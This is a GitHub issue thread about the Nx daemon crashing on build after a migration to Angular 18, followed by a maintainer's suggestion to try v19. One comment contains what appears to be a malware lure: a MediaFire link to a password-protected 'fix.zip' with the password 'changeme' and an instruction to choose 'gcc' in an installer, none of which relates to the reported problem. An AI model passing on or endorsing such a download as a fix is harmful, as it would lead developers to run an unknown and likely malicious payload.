### ISSUE TITLE
Daemon process terminated and closed the connection

### ISSUE THREAD

**Issue by vochitan90** [nrwl/nx#27689]
### Current Behavior

I migrate to angular 18 using nx successfully **BUT**

Steps:

- npx nx migrate latest
- rm -rf node_modules package-lock.json && npm i 
- resolve dependencies conflict then npm i again.
- npx nx migrate --run-migrations

Then finally when I run npm run build it say **Daemon process terminated and closed the connection**

<img width="1075" alt="image" src="https://github.com/user-attachments/assets/6e0d588e-43e8-4145-ba40-5a3ac3ae820b">

Then I check logs:

<img width="1024" alt="image" src="https://github.com/user-attachments/assets/8b1b7c6d-969d-421e-9a6b-ff39beab3e34">

### Expected Behavior

when run npm run build -> nx build successfully

### Steps to Reproduce

No

### Nx Report

```shell
No
```

### Operating System

- [X] macOS
- [ ] Linux
- [ ] Windows
- [ ] Other (Please specify)

### Additional Information

PROJECT IONIC

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jaysoo** [comment]
Can you try it with v19?
